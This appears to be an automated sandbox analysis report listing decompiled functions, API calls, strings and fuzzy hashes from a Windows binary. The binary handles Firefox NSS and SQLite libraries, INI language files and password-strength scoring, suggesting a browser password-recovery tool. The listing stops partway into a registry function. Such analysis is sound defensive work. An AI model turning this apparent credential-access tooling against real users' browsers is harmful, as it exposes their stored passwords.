Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040E988, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
memcpy.MSVCRT ref: 0040EA04
CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13

Strings

417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FromStringUuid$FreeTaskmemcpy
String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
API String ID: 1640410171-2022683286
Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004081B5, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004081B5(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E0040614B(_a4);
				if(_t3 != 0) {
					strcpy(0x4171b8, _a4);
					strcpy(0x4172c0, "general");
					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
					asm("sbb eax, eax");
					 *0x417304 =  ~(_t6 - 1) + 1;
					E00407DC1(0x417308, "charset", 0x3f);
					E00407DC1(0x417348, "TranslatorName", 0x3f);
					return E00407DC1(0x417388, "TranslatorURL", 0xff);
				}
				return _t3;
			}

0x004081b9
0x004081c1
0x004081cf
0x004081df
0x004081f0
0x004081f9
0x00408208
0x0040820d
0x0040821e
0x00000000
0x0040823b
0x0040823c

APIs

Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F

strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
GetPrivateProfileIntA.KERNEL32 ref: 004081F0

Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC

Strings

TranslatorName, xrefs: 00408214
TranslatorURL, xrefs: 00408228
charset, xrefs: 004081FE
HsA, xrefs: 00408219
general, xrefs: 004081D4
rtl, xrefs: 004081EA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfilestrcpy$AttributesFileString
String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 185930432-2094606381
Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E

Uniqueness

Uniqueness Score: -1.00%

Function 0040DEA9, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DEA9() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}

0x0040debf
0x0040dec8
0x0040deca
0x0040ded4
0x0040ded6
0x0040ded9
0x0040ded9
0x0040dedd
0x0040dee0
0x0040dee0
0x0040dee4
0x00000000
0x0040dee7
0x0040deed

APIs

GetModuleHandleA.KERNEL32(nss3.dll,74E057D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7

Strings

nss3.dll, xrefs: 0040DEB3
mozsqlite3.dll, xrefs: 0040DEC3
sqlite3.dll, xrefs: 0040DEBA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeHandleLibraryModule
String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
API String ID: 662261464-3550686275
Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8

Uniqueness

Uniqueness Score: -1.00%

Function 0040875C, Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00408572(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L004115D0();
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L004115D0();
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x4168e0;
				do {
					_t21 =  &_v8; // 0x4168e0
					_t99 =  *_t21;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t24 =  &_v8; // 0x4168e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
						_t121 = E004078FF(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x416ab4;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110);
				L004115D0();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L004115D0();
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					_push( ~(0 | _t180 > 0x00000000) | _t117);
					L004115D0();
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004086DC(_t172);
			}

0x0040875c
0x00408765
0x00408767
0x0040876f
0x00408775
0x00408776
0x00408780
0x00408783
0x00408788
0x00408792
0x00408793
0x00408798
0x004087a2
0x004087a5
0x004087ae
0x004087af
0x004087b6
0x004087b9
0x004087c0
0x004087c0
0x004087c0
0x004087c3
0x004087c5
0x004087c8
0x004087d7
0x004087dc
0x004087eb
0x004087f1
0x004087f4
0x004087ff
0x00408809
0x00408811
0x00408814
0x00408818
0x00408831
0x00408835
0x00408842
0x00408846
0x00408846
0x00408847
0x0040884b
0x0040884b
0x0040885b
0x0040885f
0x00408866
0x00408869
0x0040886e
0x00408871
0x0040887c
0x0040887d
0x00408882
0x00408884
0x00408887
0x0040888c
0x00408892
0x004088ee
0x004088ee
0x00408894
0x00408894
0x00408897
0x00408899
0x0040889c
0x0040889e
0x0040889e
0x004088a8
0x004088af
0x004088b2
0x004088b7
0x004088be
0x004088bf
0x004088c4
0x004088c9
0x004088cb
0x004088cb
0x004088d2
0x004088d5
0x004088db
0x004088e6
0x004088e6
0x004088ec
0x004088f0
0x004088fa
0x00408902
0x00408905
0x0040890b
0x00408911
0x00408917
0x0040892a

APIs

Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD

??2@YAPAXI@Z.MSVCRT ref: 00408793
??2@YAPAXI@Z.MSVCRT ref: 004087AF
memcpy.MSVCRT ref: 004087D7
memcpy.MSVCRT ref: 004087F4
??2@YAPAXI@Z.MSVCRT ref: 0040887D
??2@YAPAXI@Z.MSVCRT ref: 00408887
??2@YAPAXI@Z.MSVCRT ref: 004088BF

Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07

Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74E04DE0), ref: 0040797A
Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998

Strings

hA, xrefs: 004087C0, 004087DC, 00408847, 004087CD, 004087E7
Mt, xrefs: 00408858, 004088E2, 0040889E
Mt, xrefs: 00408828

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
String ID: Mt$Mt$hA
API String ID: 3781940870-1187762479
Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0040E172, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040E172(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E004069D2(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E00406325( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E00406325( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040e172
0x0040e172
0x0040e17f
0x0040e18a
0x0040e193
0x0040e1b3
0x0040e1b8
0x0040e200
0x0040e249
0x0040e202
0x0040e210
0x0040e217
0x0040e223
0x0040e232
0x0040e239
0x0040e23d
0x0040e242
0x0040e1ba
0x0040e1c8
0x0040e1cf
0x0040e1db
0x0040e1e8
0x0040e1ed
0x0040e1f3
0x0040e1f8
0x0040e251
0x0040e254
0x0040e254
0x0040e196
0x0040e197
0x0040e198
0x00000000
0x0040e19e
0x0040e181
0x00000000

APIs

strchr.MSVCRT ref: 0040E18A
strcpy.MSVCRT(?,-00000001), ref: 0040E198

Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A

strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
memset.MSVCRT ref: 0040E1CF

Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A

memset.MSVCRT ref: 0040E217
memcpy.MSVCRT ref: 0040E232
strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D

Strings

\systemroot, xrefs: 0040E1A5

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
String ID: \systemroot
API String ID: 1680921474-1821301763
Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE4, Relevance: 15.1, APIs: 10, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401657(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
				 *__esp = 0x3ee;
				GetDlgItem(??, ??) = E0040F037(__eax);
				 *__esp = 0x3ef;
				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
				 *__esp = 0x3f4;
				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
				__eax =  *(__ebx + 4);
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}

0x00405be4
0x00405be4
0x00405be4
0x00405be9
0x00405bea
0x00405bed
0x00405bf8
0x00405bfb
0x00405c07
0x00405c16
0x00405c1a
0x00405c1a
0x00405c24
0x00405c26
0x00405c2a
0x00405c30
0x00405c3c
0x00405c41
0x00405c4e
0x00405c53
0x00405c60
0x00405c65
0x00405c72
0x00405c77
0x00405c80
0x00405c86
0x00405c87
0x00405c89
0x00405c8b
0x0040163a
0x00401640
0x00401647
0x0040164d
0x00401656

APIs

GetClientRect.USER32 ref: 00405BFB
GetWindow.USER32(?,00000005), ref: 00405C13
GetWindow.USER32(00000000), ref: 00405C16

Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681

GetWindow.USER32(00000000,00000002), ref: 00405C22
GetDlgItem.USER32 ref: 00405C39
GetDlgItem.USER32 ref: 00405C4B
GetDlgItem.USER32 ref: 00405C5D
GetDlgItem.USER32 ref: 00405C6F
GetDlgItem.USER32 ref: 00405C7D
SetFocus.USER32(00000000), ref: 00405C80

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ItemWindow$Rect$ClientFocusPoints
String ID:
API String ID: 2187283481-0
Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68

Uniqueness

Uniqueness Score: -1.00%

Function 00401A50, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00401A50(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045E8( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x414510;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x414518;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x414520;
								} else {
									L30:
									_t159 = _t165 +  *0x414528;
								}
								goto L41;
							}
						} else {
							E004045E8( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x414508;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L004115B8();
					_v36 = _t159;
					 *_t125 =  *0x414500;
					L004115B8();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}

0x00401a50
0x00401a50
0x00401a56
0x00401a5c
0x00401a61
0x00401a63
0x00401a65
0x00401a69
0x00401a6d
0x00401a6e
0x00401a72
0x00401a76
0x00401a7a
0x00401a7e
0x00401a82
0x00401a86
0x00401a8a
0x00401a92
0x00401a96
0x00401a9a
0x00401a9e
0x00401aa4
0x00401aa4
0x00401aad
0x00401ab1
0x00401ab3
0x00401ab3
0x00401abd
0x00401abf
0x00401abf
0x00401ac9
0x00401acb
0x00401acb
0x00401ad5
0x00401ad7
0x00401ad7
0x00401ae1
0x00401ae3
0x00401ae3
0x00401aed
0x00401aef
0x00401aef
0x00401af6
0x00401b01
0x00401b04
0x00000000
0x00000000
0x00401af8
0x00401afb
0x00401b06
0x00401b06
0x00401afd
0x00401afd
0x00000000
0x00401afd
0x00401afb
0x00401b0c
0x00401b20
0x00401b26
0x00401b48
0x00401b48
0x00401b28
0x00000000
0x00401b28
0x00401b2a
0x00401b3b
0x00401b32
0x00401b36
0x00401b36
0x00401b3f
0x00000000
0x00000000
0x00401b41
0x00401b46
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b46
0x00401b4b
0x00401b4b
0x00401b4f
0x00401b82
0x00401b93
0x00401b9b
0x00401b9c
0x00401ba4
0x00401ba4
0x00401baa
0x00401bbb
0x00401bd1
0x00000000
0x00000000
0x00401bbd
0x00401bc0
0x00000000
0x00401bc2
0x00401bc6
0x00401bc6
0x00000000
0x00401bc0
0x00401bac
0x00401bb0
0x00000000
0x00401bb0
0x00401b9e
0x00401b9e
0x00000000
0x00401b9e
0x00401b51
0x00401b5c
0x00401b63
0x00401b67
0x00401b68
0x00401b72
0x00401b6a
0x00401b6a
0x00401b6a
0x00401b6a
0x00000000
0x00401b68
0x00401b0e
0x00401b16
0x00401bd3
0x00401bd7
0x00401bdd
0x00401bdd
0x00401bdd
0x00401be1
0x00401be2
0x00401aa4
0x00401bf2
0x00401bf6
0x00401bf7
0x00401bf9
0x00401bf9
0x00401c01
0x00401c03
0x00401c03
0x00401c0b
0x00401c0d
0x00401c0d
0x00401c16
0x00401c18
0x00401c18
0x00401c21
0x00401c23
0x00401c23
0x00401c2c
0x00401c2e
0x00401c2e
0x00401c37
0x00401c83
0x00401c89
0x00401c8e
0x00401c8f
0x00401c39
0x00401c39
0x00401c3d
0x00401c3e
0x00401c3f
0x00401c42
0x00401c47
0x00401c51
0x00401c54
0x00401c5d
0x00401c67
0x00401c6b
0x00401c6f
0x00401c75
0x00401c7a
0x00401c7b
0x00401c7b
0x00401c96

APIs

strlen.MSVCRT ref: 00401A5C
abs.MSVCRT ref: 00401B5C
abs.MSVCRT ref: 00401B93
log.MSVCRT ref: 00401C42
log.MSVCRT ref: 00401C54
free.MSVCRT(?), ref: 00401C75
free.MSVCRT(?), ref: 00401C89

Strings

, xrefs: 00401A8A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: free$strlen
String ID:
API String ID: 667451143-3916222277
Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D4A6(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
